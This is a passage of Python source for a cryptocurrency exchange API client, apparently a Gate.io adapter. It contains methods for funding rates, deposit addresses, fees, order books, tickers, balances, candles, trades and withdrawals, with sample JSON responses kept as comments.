\"ref_discount_rate\": \"0\",\n # \"order_price_deviate\": \"0.5\",\n # \"maintenance_rate\": \"0.005\",\n # \"mark_type\": \"index\",\n # \"last_price\": \"38026\",\n # \"mark_price\": \"37985.6\",\n # \"index_price\": \"37954.92\",\n # \"funding_rate_indicative\": \"0.000219\",\n # \"mark_price_round\": \"0.01\",\n # \"funding_offset\": 0,\n # \"in_delisting\": False,\n # 
\"risk_limit_base\": \"1000000\",\n # \"interest_rate\": \"0.0003\",\n # \"order_price_round\": \"0.1\",\n # \"order_size_min\": 1,\n # \"ref_rebate_rate\": \"0.2\",\n # \"funding_interval\": 28800,\n # \"risk_limit_step\": \"1000000\",\n # \"leverage_min\": \"1\",\n # \"leverage_max\": \"100\",\n # \"risk_limit_max\": \"8000000\",\n # \"maker_fee_rate\": \"-0.00025\",\n # \"taker_fee_rate\": \"0.00075\",\n # \"funding_rate\": \"0.002053\",\n # \"order_size_max\": 1000000,\n # \"funding_next_apply\": 1610035200,\n # \"short_users\": 977,\n # \"config_change_time\": 1609899548,\n # \"trade_size\": 28530850594,\n # \"position_size\": 5223816,\n # \"long_users\": 455,\n # \"funding_impact_value\": \"60000\",\n # \"orders_limit\": 50,\n # \"trade_id\": 10851092,\n # \"orderbook_id\": 2129638396\n # }\n # ]\n #\n return self.parse_funding_rate(response)\n\n def fetch_funding_rates(self, symbols=None, params={}):\n self.load_markets()\n settle = self.safe_string(params, 'settle') # TODO: Save settle in markets?\n request = {\n 'settle': settle.lower(),\n }\n response = self.publicFuturesGetSettleContracts(self.extend(request, params))\n #\n # [\n # {\n # \"name\": \"BTC_USDT\",\n # \"type\": \"direct\",\n # \"quanto_multiplier\": \"0.0001\",\n # \"ref_discount_rate\": \"0\",\n # \"order_price_deviate\": \"0.5\",\n # \"maintenance_rate\": \"0.005\",\n # \"mark_type\": \"index\",\n # \"last_price\": \"38026\",\n # \"mark_price\": \"37985.6\",\n # \"index_price\": \"37954.92\",\n # \"funding_rate_indicative\": \"0.000219\",\n # \"mark_price_round\": \"0.01\",\n # \"funding_offset\": 0,\n # \"in_delisting\": False,\n # \"risk_limit_base\": \"1000000\",\n # \"interest_rate\": \"0.0003\",\n # \"order_price_round\": \"0.1\",\n # \"order_size_min\": 1,\n # \"ref_rebate_rate\": \"0.2\",\n # \"funding_interval\": 28800,\n # \"risk_limit_step\": \"1000000\",\n # \"leverage_min\": \"1\",\n # \"leverage_max\": \"100\",\n # \"risk_limit_max\": \"8000000\",\n # \"maker_fee_rate\": \"-0.00025\",\n # \"taker_fee_rate\": \"0.00075\",\n # \"funding_rate\": \"0.002053\",\n # \"order_size_max\": 1000000,\n # \"funding_next_apply\": 1610035200,\n # \"short_users\": 977,\n # \"config_change_time\": 1609899548,\n # \"trade_size\": 28530850594,\n # \"position_size\": 5223816,\n # \"long_users\": 455,\n # \"funding_impact_value\": \"60000\",\n # \"orders_limit\": 50,\n # \"trade_id\": 10851092,\n # \"orderbook_id\": 2129638396\n # }\n # ]\n #\n result = self.parse_funding_rates(response)\n return self.filter_by_array(result, 'symbol', symbols)\n\n def parse_funding_rate(self, contract, market=None):\n #\n # {\n # \"name\": \"BTC_USDT\",\n # \"type\": \"direct\",\n # \"quanto_multiplier\": \"0.0001\",\n # \"ref_discount_rate\": \"0\",\n # \"order_price_deviate\": \"0.5\",\n # \"maintenance_rate\": \"0.005\",\n # \"mark_type\": \"index\",\n # \"last_price\": \"38026\",\n # \"mark_price\": \"37985.6\",\n # \"index_price\": \"37954.92\",\n # \"funding_rate_indicative\": \"0.000219\",\n # \"mark_price_round\": \"0.01\",\n # \"funding_offset\": 0,\n # \"in_delisting\": False,\n # \"risk_limit_base\": \"1000000\",\n # \"interest_rate\": \"0.0003\",\n # \"order_price_round\": \"0.1\",\n # \"order_size_min\": 1,\n # \"ref_rebate_rate\": \"0.2\",\n # \"funding_interval\": 28800,\n # \"risk_limit_step\": \"1000000\",\n # \"leverage_min\": \"1\",\n # \"leverage_max\": \"100\",\n # \"risk_limit_max\": \"8000000\",\n # \"maker_fee_rate\": \"-0.00025\",\n # \"taker_fee_rate\": \"0.00075\",\n # \"funding_rate\": \"0.002053\",\n # 
\"order_size_max\": 1000000,\n # \"funding_next_apply\": 1610035200,\n # \"short_users\": 977,\n # \"config_change_time\": 1609899548,\n # \"trade_size\": 28530850594,\n # \"position_size\": 5223816,\n # \"long_users\": 455,\n # \"funding_impact_value\": \"60000\",\n # \"orders_limit\": 50,\n # \"trade_id\": 10851092,\n # \"orderbook_id\": 2129638396\n # }\n #\n marketId = self.safe_string(contract, 'name')\n symbol = self.safe_symbol(marketId, market)\n markPrice = self.safe_number(contract, 'mark_price')\n indexPrice = self.safe_number(contract, 'index_price')\n interestRate = self.safe_number(contract, 'interest_rate')\n fundingRate = self.safe_string(contract, 'funding_rate')\n fundingInterval = self.safe_string(contract, 'funding_interval') * 1000\n nextFundingTime = self.safe_integer(contract, 'funding_next_apply') * 1000\n previousFundingTime = (self.safe_number(contract, 'funding_next_apply') * 1000) - fundingInterval\n fundingRateIndicative = self.safe_number(contract, 'funding_rate_indicative')\n timestamp = self.milliseconds()\n return {\n 'info': contract,\n 'symbol': symbol,\n 'markPrice': markPrice,\n 'indexPrice': indexPrice,\n 'interestRate': interestRate,\n 'estimatedSettlePrice': None,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'previousFundingRate': fundingRate,\n 'nextFundingRate': fundingRateIndicative,\n 'previousFundingTimestamp': previousFundingTime,\n 'nextFundingTimestamp': nextFundingTime,\n 'previousFundingDatetime': self.iso8601(previousFundingTime),\n 'nextFundingDatetime': self.iso8601(nextFundingTime),\n }\n\n def fetch_network_deposit_address(self, code, params={}):\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n }\n response = self.privateWalletGetDepositAddress(self.extend(request, params))\n addresses = self.safe_value(response, 'multichain_addresses')\n currencyId = self.safe_string(response, 'currency')\n code = self.safe_currency_code(currencyId)\n result = {}\n for i in range(0, len(addresses)):\n entry = addresses[i]\n #\n # {\n # \"chain\": \"ETH\",\n # \"address\": \"0x359a697945E79C7e17b634675BD73B33324E9408\",\n # \"payment_id\": \"\",\n # \"payment_name\": \"\",\n # \"obtain_failed\": \"0\"\n # }\n #\n obtainFailed = self.safe_integer(entry, 'obtain_failed')\n if obtainFailed:\n continue\n network = self.safe_string(entry, 'chain')\n address = self.safe_string(entry, 'address')\n tag = self.safe_string(entry, 'payment_id')\n tagLength = len(tag)\n tag = tag if tagLength else None\n result[network] = {\n 'info': entry,\n 'code': code,\n 'address': address,\n 'tag': tag,\n }\n return result\n\n def fetch_deposit_address(self, code, params={}):\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n }\n response = self.privateWalletGetDepositAddress(self.extend(request, params))\n #\n # {\n # \"currency\": \"XRP\",\n # \"address\": \"rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d 391331007\",\n # \"multichain_addresses\": [\n # {\n # \"chain\": \"XRP\",\n # \"address\": \"rHcFoo6a9qT5NHiVn1THQRhsEGcxtYCV4d\",\n # \"payment_id\": \"391331007\",\n # \"payment_name\": \"Tag\",\n # \"obtain_failed\": 0\n # }\n # ]\n # }\n #\n currencyId = self.safe_string(response, 'currency')\n code = self.safe_currency_code(currencyId)\n addressField = self.safe_string(response, 'address')\n tag = None\n address = None\n if addressField.find(' ') >= 0:\n splitted = addressField.split(' ')\n address = splitted[0]\n tag = splitted[1]\n else:\n address = 
addressField\n return {\n 'info': response,\n 'code': code,\n 'address': address,\n 'tag': tag,\n 'network': None,\n }\n\n def fetch_trading_fees(self, params={}):\n self.load_markets()\n response = self.privateWalletGetFee(params)\n #\n # {\n # \"user_id\": 1486602,\n # \"taker_fee\": \"0.002\",\n # \"maker_fee\": \"0.002\",\n # \"gt_discount\": True,\n # \"gt_taker_fee\": \"0.0015\",\n # \"gt_maker_fee\": \"0.0015\",\n # \"loan_fee\": \"0.18\",\n # \"point_type\": \"0\",\n # \"futures_taker_fee\": \"0.0005\",\n # \"futures_maker_fee\": \"0\"\n # }\n #\n result = {}\n taker = self.safe_number(response, 'taker_fee')\n maker = self.safe_number(response, 'maker_fee')\n for i in range(0, len(self.symbols)):\n symbol = self.symbols[i]\n result[symbol] = {\n 'maker': maker,\n 'taker': taker,\n 'info': response,\n 'symbol': symbol,\n }\n return result\n\n def fetch_funding_fees(self, params={}):\n self.load_markets()\n response = self.privateWalletGetWithdrawStatus(params)\n #\n # {\n # \"currency\": \"MTN\",\n # \"name\": \"Medicalchain\",\n # \"name_cn\": \"Medicalchain\",\n # \"deposit\": \"0\",\n # \"withdraw_percent\": \"0%\",\n # \"withdraw_fix\": \"900\",\n # \"withdraw_day_limit\": \"500000\",\n # \"withdraw_day_limit_remain\": \"500000\",\n # \"withdraw_amount_mini\": \"900.1\",\n # \"withdraw_eachtime_limit\": \"90000000000\",\n # \"withdraw_fix_on_chains\": {\n # \"ETH\": \"900\"\n # }\n # }\n #\n withdrawFees = {}\n for i in range(0, len(response)):\n entry = response[i]\n currencyId = self.safe_string(entry, 'currency')\n code = self.safe_currency_code(currencyId)\n withdrawFees[code] = {}\n withdrawFix = self.safe_value(entry, 'withdraw_fix_on_chains')\n if withdrawFix is None:\n withdrawFix = {}\n withdrawFix[code] = self.safe_number(entry, 'withdraw_fix')\n keys = list(withdrawFix.keys())\n for i in range(0, len(keys)):\n key = keys[i]\n withdrawFees[code][key] = self.parse_number(withdrawFix[key])\n return {\n 'info': response,\n 'withdraw': withdrawFees,\n 'deposit': {},\n }\n\n def fetch_funding_history(self, symbol=None, since=None, limit=None, params={}):\n self.load_markets()\n # defaultType = 'future'\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchFundingHistory() requires the argument \"symbol\"')\n market = self.market(symbol)\n request = self.prepare_request(market)\n request['type'] = 'fund' # 'dnw' 'pnl' 'fee' 'refr' 'fund' 'point_dnw' 'point_fee' 'point_refr'\n if since is not None:\n request['from'] = since\n if limit is not None:\n request['limit'] = limit\n method = self.get_supported_mapping(market['type'], {\n 'swap': 'privateFuturesGetSettleAccountBook',\n 'futures': 'privateDeliveryGetSettleAccountBook',\n })\n response = getattr(self, method)(self.extend(request, params))\n result = []\n for i in range(0, len(response)):\n entry = response[i]\n timestamp = self.safe_timestamp(entry, 'time')\n result.append({\n 'info': entry,\n 'symbol': symbol,\n 'code': self.safe_currency_code(self.safe_string(entry, 'text')),\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'id': None,\n 'amount': self.safe_number(entry, 'change'),\n })\n return result\n\n def fetch_order_book(self, symbol, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n #\n # request = {\n # 'currency_pair': market['id'],\n # 'interval': '0', # depth, 0 means no aggregation is applied, default to 0\n # 'limit': limit, # maximum number of order depth data in asks or bids\n # 'with_id': True, # return order book ID\n # }\n #\n request = 
self.prepare_request(market)\n spot = market['spot']\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'publicSpotGetOrderBook',\n # 'margin': 'publicMarginGetOrderBook',\n 'swap': 'publicFuturesGetSettleOrderBook',\n 'futures': 'publicDeliveryGetSettleOrderBook',\n })\n if limit is not None:\n request['limit'] = limit # default 10, max 100\n response = getattr(self, method)(self.extend(request, params))\n #\n # SPOT\n #\n # {\n # \"current\": 1634345973275,\n # \"update\": 1634345973271,\n # \"asks\": [\n # [\"2.2241\",\"12449.827\"],\n # [\"2.2242\",\"200\"],\n # [\"2.2244\",\"826.931\"],\n # [\"2.2248\",\"3876.107\"],\n # [\"2.225\",\"2377.252\"],\n # [\"2.22509\",\"439.484\"],\n # [\"2.2251\",\"1489.313\"],\n # [\"2.2253\",\"714.582\"],\n # [\"2.2254\",\"1349.784\"],\n # [\"2.2256\",\"234.701\"]],\n # \"bids\":[\n # [\"2.2236\",\"32.465\"],\n # [\"2.2232\",\"243.983\"],\n # [\"2.2231\",\"32.207\"],\n # [\"2.223\",\"449.827\"],\n # [\"2.2228\",\"7.918\"],\n # [\"2.2227\",\"12703.482\"],\n # [\"2.2226\",\"143.033\"],\n # [\"2.2225\",\"143.027\"],\n # [\"2.2224\",\"1369.352\"],\n # [\"2.2223\",\"756.063\"]\n # ]\n # }\n #\n # Perpetual Swap\n #\n # {\n # \"current\": 1634350208.745,\n # \"asks\": [\n # {\"s\":24909,\"p\": \"61264.8\"},\n # {\"s\":81,\"p\": \"61266.6\"},\n # {\"s\":2000,\"p\": \"61267.6\"},\n # {\"s\":490,\"p\": \"61270.2\"},\n # {\"s\":12,\"p\": \"61270.4\"},\n # {\"s\":11782,\"p\": \"61273.2\"},\n # {\"s\":14666,\"p\": \"61273.3\"},\n # {\"s\":22541,\"p\": \"61273.4\"},\n # {\"s\":33,\"p\": \"61273.6\"},\n # {\"s\":11980,\"p\": \"61274.5\"}\n # ],\n # \"bids\": [\n # {\"s\":41844,\"p\": \"61264.7\"},\n # {\"s\":13783,\"p\": \"61263.3\"},\n # {\"s\":1143,\"p\": \"61259.8\"},\n # {\"s\":81,\"p\": \"61258.7\"},\n # {\"s\":2471,\"p\": \"61257.8\"},\n # {\"s\":2471,\"p\": \"61257.7\"},\n # {\"s\":2471,\"p\": \"61256.5\"},\n # {\"s\":3,\"p\": \"61254.2\"},\n # {\"s\":114,\"p\": \"61252.4\"},\n # {\"s\":14372,\"p\": \"61248.6\"}\n # ],\n # \"update\": 1634350208.724\n # }\n #\n timestamp = self.safe_integer(response, 'current')\n if not spot:\n timestamp = timestamp * 1000\n priceKey = 0 if spot else 'p'\n amountKey = 1 if spot else 's'\n return self.parse_order_book(response, symbol, timestamp, 'bids', 'asks', priceKey, amountKey)\n\n def fetch_ticker(self, symbol, params={}):\n self.load_markets()\n market = self.market(symbol)\n request = self.prepare_request(market)\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'publicSpotGetTickers',\n # 'margin': 'publicMarginGetTickers',\n 'swap': 'publicFuturesGetSettleTickers',\n 'futures': 'publicDeliveryGetSettleTickers',\n })\n response = getattr(self, method)(self.extend(request, params))\n ticker = self.safe_value(response, 0)\n return self.parse_ticker(ticker, market)\n\n def parse_ticker(self, ticker, market=None):\n #\n # SPOT\n #\n # {\n # \"currency_pair\": \"KFC_USDT\",\n # \"last\": \"7.255\",\n # \"lowest_ask\": \"7.298\",\n # \"highest_bid\": \"7.218\",\n # \"change_percentage\": \"-1.18\",\n # \"base_volume\": \"1219.053687865\",\n # \"quote_volume\": \"8807.40299875455\",\n # \"high_24h\": \"7.262\",\n # \"low_24h\": \"7.095\"\n # }\n #\n # LINEAR/DELIVERY\n #\n # {\n # \"contract\": \"BTC_USDT\",\n # \"last\": \"6432\",\n # \"low_24h\": \"6278\",\n # \"high_24h\": \"6790\",\n # \"change_percentage\": \"4.43\",\n # \"total_size\": \"32323904\",\n # \"volume_24h\": \"184040233284\",\n # \"volume_24h_btc\": \"28613220\",\n # \"volume_24h_usd\": \"184040233284\",\n # \"volume_24h_base\": 
\"28613220\",\n # \"volume_24h_quote\": \"184040233284\",\n # \"volume_24h_settle\": \"28613220\",\n # \"mark_price\": \"6534\",\n # \"funding_rate\": \"0.0001\",\n # \"funding_rate_indicative\": \"0.0001\",\n # \"index_price\": \"6531\"\n # }\n #\n marketId = self.safe_string_2(ticker, 'currency_pair', 'contract')\n symbol = self.safe_symbol(marketId, market)\n last = self.safe_number(ticker, 'last')\n ask = self.safe_number(ticker, 'lowest_ask')\n bid = self.safe_number(ticker, 'highest_bid')\n high = self.safe_number(ticker, 'high_24h')\n low = self.safe_number(ticker, 'low_24h')\n baseVolume = self.safe_number(ticker, 'base_volume', 'volume_24h_base')\n quoteVolume = self.safe_number(ticker, 'quote_volume', 'volume_24h_quote')\n percentage = self.safe_number(ticker, 'change_percentage')\n return self.safe_ticker({\n 'symbol': symbol,\n 'timestamp': None,\n 'datetime': None,\n 'high': high,\n 'low': low,\n 'bid': bid,\n 'bidVolume': None,\n 'ask': ask,\n 'askVolume': None,\n 'vwap': None,\n 'open': None,\n 'close': last,\n 'last': last,\n 'previousClose': None,\n 'change': None,\n 'percentage': percentage,\n 'average': None,\n 'baseVolume': baseVolume,\n 'quoteVolume': quoteVolume,\n 'info': ticker,\n }, market)\n\n def fetch_tickers(self, symbols=None, params={}):\n self.load_markets()\n defaultType = self.safe_string_2(self.options, 'fetchTickers', 'defaultType', 'spot')\n type = self.safe_string(params, 'type', defaultType)\n params = self.omit(params, 'type')\n method = self.get_supported_mapping(type, {\n 'spot': 'publicSpotGetTickers',\n # 'margin': 'publicMarginGetTickers',\n 'swap': 'publicFuturesGetSettleTickers',\n 'futures': 'publicDeliveryGetSettleTickers',\n })\n request = {}\n futures = type == 'futures'\n swap = type == 'swap'\n if (swap or futures) and not params['settle']:\n request['settle'] = 'usdt' if swap else 'btc'\n response = getattr(self, method)(self.extend(request, params))\n return self.parse_tickers(response, symbols)\n\n def fetch_balance(self, params={}):\n # :param params.type: spot, margin, crossMargin, swap or future\n # :param params.settle: Settle currency(usdt or btc) for perpetual swap and futures\n self.load_markets()\n defaultType = self.safe_string_2(self.options, 'fetchBalance', 'defaultType', 'spot')\n type = self.safe_string(params, 'type', defaultType)\n params = self.omit(params, 'type')\n swap = type == 'swap'\n futures = type == 'futures'\n method = self.get_supported_mapping(type, {\n 'spot': 'privateSpotGetAccounts',\n # 'margin': 'publicMarginGetTickers',\n 'swap': 'privateFuturesGetSettleAccounts',\n 'futures': 'privateDeliveryGetSettleAccounts',\n })\n request = {}\n response = []\n if swap or futures:\n defaultSettle = 'usdt' if swap else 'btc'\n request['settle'] = self.safe_string(params, 'settle', defaultSettle)\n response_item = getattr(self, method)(self.extend(request, params))\n response = [response_item]\n else:\n response = getattr(self, method)(self.extend(request, params))\n # SPOT\n # [\n # {\n # \"currency\": \"DBC\",\n # \"available\": \"0\",\n # \"locked\": \"0\"\n # },\n # ...\n # ]\n #\n # Perpetual Swap\n # {\n # order_margin: \"0\",\n # point: \"0\",\n # bonus: \"0\",\n # history: {\n # dnw: \"2.1321\",\n # pnl: \"11.5351\",\n # refr: \"0\",\n # point_fee: \"0\",\n # fund: \"-0.32340576684\",\n # bonus_dnw: \"0\",\n # point_refr: \"0\",\n # bonus_offset: \"0\",\n # fee: \"-0.20132775\",\n # point_dnw: \"0\",\n # },\n # unrealised_pnl: \"13.315100000006\",\n # total: \"12.51345151332\",\n # available: \"0\",\n # 
in_dual_mode: False,\n # currency: \"USDT\",\n # position_margin: \"12.51345151332\",\n # user: \"6333333\",\n # }\n #\n # Delivery Future\n # {\n # order_margin: \"0\",\n # point: \"0\",\n # history: {\n # dnw: \"1\",\n # pnl: \"0\",\n # refr: \"0\",\n # point_fee: \"0\",\n # point_dnw: \"0\",\n # settle: \"0\",\n # settle_fee: \"0\",\n # point_refr: \"0\",\n # fee: \"0\",\n # },\n # unrealised_pnl: \"0\",\n # total: \"1\",\n # available: \"1\",\n # currency: \"USDT\",\n # position_margin: \"0\",\n # user: \"6333333\",\n # }\n result = {}\n for i in range(0, len(response)):\n entry = response[i]\n account = self.account()\n currencyId = self.safe_string(entry, 'currency')\n code = self.safe_currency_code(currencyId)\n account['used'] = self.safe_string_2(entry, 'locked', 'position_margin')\n account['free'] = self.safe_string(entry, 'available')\n result[code] = account\n return self.parse_balance(result)\n\n def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n price = self.safe_string(params, 'price')\n request = self.prepare_request(market)\n request['interval'] = self.timeframes[timeframe]\n method = 'publicSpotGetCandlesticks'\n if market['contract']:\n if market['futures']:\n method = 'publicDeliveryGetSettleCandlesticks'\n elif market['swap']:\n method = 'publicFuturesGetSettleCandlesticks'\n isMark = (price == 'mark')\n isIndex = (price == 'index')\n if isMark or isIndex:\n request['contract'] = price + '_' + market['id']\n params = self.omit(params, 'price')\n if since is None:\n if limit is not None:\n request['limit'] = limit\n else:\n request['from'] = int(since / 1000)\n if limit is not None:\n request['to'] = self.sum(request['from'], limit * self.parse_timeframe(timeframe) - 1)\n response = getattr(self, method)(self.extend(request, params))\n return self.parse_ohlcvs(response, market, timeframe, since, limit)\n\n def fetch_mark_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):\n request = {\n 'price': 'mark',\n }\n return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))\n\n def fetch_funding_rate_history(self, symbol=None, limit=None, since=None, params={}):\n self.load_markets()\n if symbol is None:\n raise ArgumentsRequired(self.id + ' fetchFundingRateHistory() requires a symbol argument')\n market = self.market(symbol)\n request = {\n 'contract': market['id'],\n 'settle': market['quote'].lower(),\n }\n if limit is not None:\n request['limit'] = limit\n method = 'publicFuturesGetSettleFundingRate'\n response = getattr(self, method)(self.extend(request, params))\n #\n # {\n # \"r\": \"0.00063521\",\n # \"t\": \"1621267200000\",\n # }\n #\n rates = []\n for i in range(0, len(response)):\n entry = response[i]\n timestamp = self.safe_timestamp(entry, 't')\n rates.append({\n 'info': entry,\n 'symbol': symbol,\n 'fundingRate': self.safe_number(entry, 'r'),\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n })\n return self.sort_by(rates, 'timestamp')\n\n def fetch_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):\n request = {\n 'price': 'index',\n }\n return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))\n\n def parse_ohlcv(self, ohlcv, market=None):\n #\n # Spot market candles\n #\n # [\n # \"1626163200\", # Unix timestamp in seconds\n # \"346711.933138181617\", # Trading volume\n # \"33165.23\", # Close price\n # \"33260\", # Highest price\n # \"33117.6\", # Lowest 
price\n # \"33184.47\" # Open price\n # ]\n #\n # Mark and Index price candles\n #\n # {\n # \"t\":1632873600, # Unix timestamp in seconds\n # \"o\": \"41025\", # Open price\n # \"h\": \"41882.17\", # Highest price\n # \"c\": \"41776.92\", # Close price\n # \"l\": \"40783.94\" # Lowest price\n # }\n #\n if isinstance(ohlcv, list):\n return [\n self.safe_timestamp(ohlcv, 0), # unix timestamp in seconds\n self.safe_number(ohlcv, 5), # open price\n self.safe_number(ohlcv, 3), # highest price\n self.safe_number(ohlcv, 4), # lowest price\n self.safe_number(ohlcv, 2), # close price\n self.safe_number(ohlcv, 1), # trading volume\n ]\n else:\n # Mark and Index price candles\n return [\n self.safe_timestamp(ohlcv, 't'), # unix timestamp in seconds\n self.safe_number(ohlcv, 'o'), # open price\n self.safe_number(ohlcv, 'h'), # highest price\n self.safe_number(ohlcv, 'l'), # lowest price\n self.safe_number(ohlcv, 'c'), # close price\n self.safe_number(ohlcv, 'v'), # trading volume, None for mark or index price\n ]\n\n def fetch_trades(self, symbol, since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n #\n # spot\n #\n # request = {\n # 'currency_pair': market['id'],\n # 'limit': limit, # maximum number of records to be returned in a single list\n # 'last_id': 'id', # specify list staring point using the id of last record in previous list-query results\n # 'reverse': False, # True to retrieve records where id is smaller than the specified last_id, False to retrieve records where id is larger than the specified last_id\n # }\n #\n # swap, futures\n #\n # request = {\n # 'settle': market['settleId'],\n # 'contract': market['id'],\n # 'limit': limit, # maximum number of records to be returned in a single list\n # 'last_id': 'id', # specify list staring point using the id of last record in previous list-query results\n # 'from': since / 1000), # starting time in seconds, if not specified, to and limit will be used to limit response items\n # 'to': self.seconds(), # end time in seconds, default to current time\n # }\n #\n request = self.prepare_request(market)\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'publicSpotGetTrades',\n # 'margin': 'publicMarginGetTickers',\n 'swap': 'publicFuturesGetSettleTrades',\n 'futures': 'publicDeliveryGetSettleTrades',\n })\n if limit is not None:\n request['limit'] = limit # default 100, max 1000\n if since is not None and (market['contract']):\n request['from'] = int(since / 1000)\n response = getattr(self, method)(self.extend(request, params))\n #\n # spot\n #\n # [\n # {\n # id: \"1852958144\",\n # create_time: \"1634673259\",\n # create_time_ms: \"1634673259378.105000\",\n # currency_pair: \"ADA_USDT\",\n # side: \"sell\",\n # amount: \"307.078\",\n # price: \"2.104\",\n # }\n # ]\n #\n # perpetual swap\n #\n # [\n # {\n # size: \"2\",\n # id: \"2522911\",\n # create_time_ms: \"1634673380.182\",\n # create_time: \"1634673380.182\",\n # contract: \"ADA_USDT\",\n # price: \"2.10486\",\n # }\n # ]\n #\n return self.parse_trades(response, market, since, limit)\n\n def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):\n self.load_markets()\n market = self.market(symbol)\n #\n # request = {\n # 'currency_pair': market['id'],\n # # 'limit': limit,\n # # 'page': 0,\n # # 'order_id': 'Order ID',\n # # 'account': 'spot', # default to spot and margin account if not specified, set to cross_margin to operate against margin account\n # # 'from': since, # default to 7 days before current time\n # # 'to': 
self.milliseconds(), # default to current time\n # }\n #\n request = self.prepare_request(market)\n if limit is not None:\n request['limit'] = limit # default 100, max 1000\n if since is not None:\n request['from'] = int(since / 1000)\n # request['to'] = since + 7 * 24 * 60 * 60\n method = self.get_supported_mapping(market['type'], {\n 'spot': 'privateSpotGetMyTrades',\n # 'margin': 'publicMarginGetCurrencyPairs',\n 'swap': 'privateFuturesGetSettleMyTrades',\n 'futures': 'privateDeliveryGetSettleMyTrades',\n })\n response = getattr(self, method)(self.extend(request, params))\n # SPOT\n # [{\n # id: \"1851927191\",\n # create_time: \"1634333360\",\n # create_time_ms: \"1634333360359.901000\",\n # currency_pair: \"BTC_USDT\",\n # side: \"buy\",\n # role: \"taker\",\n # amount: \"0.0001\",\n # price: \"62547.51\",\n # order_id: \"93475897349\",\n # fee: \"2e-07\",\n # fee_currency: \"BTC\",\n # point_fee: \"0\",\n # gt_fee: \"0\",\n # }]\n # Perpetual Swap\n # [{\n # size: \"-13\",\n # order_id: \"79723658958\",\n # id: \"47612669\",\n # role: \"taker\",\n # create_time: \"1634600263.326\",\n # contract: \"BTC_USDT\",\n # price: \"61987.8\",\n # }]\n return self.parse_trades(response, market, since, limit)\n\n def parse_trade(self, trade, market=None):\n #\n # public\n #\n # {\n # \"id\": \"1334253759\",\n # \"create_time\": \"1626342738\",\n # \"create_time_ms\": \"1626342738331.497000\",\n # \"currency_pair\": \"BTC_USDT\",\n # \"side\": \"sell\",\n # \"amount\": \"0.0022\",\n # \"price\": \"32452.16\"\n # }\n #\n # private\n #\n # {\n # \"id\": \"218087755\",\n # \"create_time\": \"1578958740\",\n # \"create_time_ms\": \"1578958740122.710000\",\n # \"currency_pair\": \"BTC_USDT\",\n # \"side\": \"sell\",\n # \"role\": \"taker\",\n # \"amount\": \"0.0004\",\n # \"price\": \"8112.77\",\n # \"order_id\": \"8445563839\",\n # \"fee\": \"0.006490216\",\n # \"fee_currency\": \"USDT\",\n # \"point_fee\": \"0\",\n # \"gt_fee\": \"0\"\n # }\n #\n id = self.safe_string(trade, 'id')\n timestampStringContract = self.safe_string(trade, 'create_time')\n timestampString = self.safe_string_2(trade, 'create_time_ms', 'time', timestampStringContract)\n timestamp = None\n if timestampString.find('.') > 0:\n milliseconds = timestampString.split('.')\n timestamp = int(milliseconds[0])\n if market['contract']:\n timestamp = timestamp * 1000\n marketId = self.safe_string_2(trade, 'currency_pair', 'contract')\n symbol = self.safe_symbol(marketId, market)\n amountString = self.safe_string_2(trade, 'amount', 'size')\n priceString = self.safe_string(trade, 'price')\n costString = Precise.string_abs(Precise.string_mul(amountString, priceString))\n price = self.parse_number(priceString)\n cost = self.parse_number(costString)\n contractSide = 'sell' if Precise.string_lt(amountString, '0') else 'buy'\n amountString = Precise.string_abs(amountString)\n amount = self.parse_number(amountString)\n side = self.safe_string(trade, 'side', contractSide)\n orderId = self.safe_string(trade, 'order_id')\n gtFee = self.safe_string(trade, 'gt_fee')\n feeCurrency = None\n feeCost = None\n if gtFee == '0':\n feeCurrency = self.safe_string(trade, 'fee_currency')\n feeCost = self.safe_number(trade, 'fee')\n else:\n feeCurrency = 'GT'\n feeCost = self.parse_number(gtFee)\n fee = {\n 'cost': feeCost,\n 'currency': feeCurrency,\n }\n takerOrMaker = self.safe_string(trade, 'role')\n return {\n 'info': trade,\n 'id': id,\n 'timestamp': timestamp,\n 'datetime': self.iso8601(timestamp),\n 'symbol': symbol,\n 'order': orderId,\n 'type': None,\n 
'side': side,\n 'takerOrMaker': takerOrMaker,\n 'price': price,\n 'amount': amount,\n 'cost': cost,\n 'fee': fee,\n }\n\n def fetch_deposits(self, code=None, since=None, limit=None, params={}):\n self.load_markets()\n request = {}\n currency = None\n if code is not None:\n currency = self.currency(code)\n request['currency'] = currency['id']\n if limit is not None:\n request['limit'] = limit\n if since is not None:\n request['from'] = int(since / 1000)\n request['to'] = since + 30 * 24 * 60 * 60\n response = self.privateWalletGetDeposits(self.extend(request, params))\n return self.parse_transactions(response, currency)\n\n def fetch_withdrawals(self, code=None, since=None, limit=None, params={}):\n self.load_markets()\n request = {}\n currency = None\n if code is not None:\n currency = self.currency(code)\n request['currency'] = currency['id']\n if limit is not None:\n request['limit'] = limit\n if since is not None:\n request['from'] = int(since / 1000)\n request['to'] = since + 30 * 24 * 60 * 60\n response = self.privateWalletGetWithdrawals(self.extend(request, params))\n return self.parse_transactions(response, currency)\n\n def withdraw(self, code, amount, address, tag=None, params={}):\n tag, params = self.handle_withdraw_tag_and_params(tag, params)\n self.check_address(address)\n self.load_markets()\n currency = self.currency(code)\n request = {\n 'currency': currency['id'],\n 'address': address,\n 'amount': self.currency_to_precision(code, amount),\n }\n if tag is not None:\n request['memo'] = tag\n networks = self.safe_value(self.options, 'networks', {})\n network = self.safe_string_upper(params, 'network') # self line allows the user to specify either ERC20 or ETH\n network = self.safe_string_lower(networks, network, network) # handle ETH>ERC20 alias\n if network is not None:\n request['chain'] = network\n 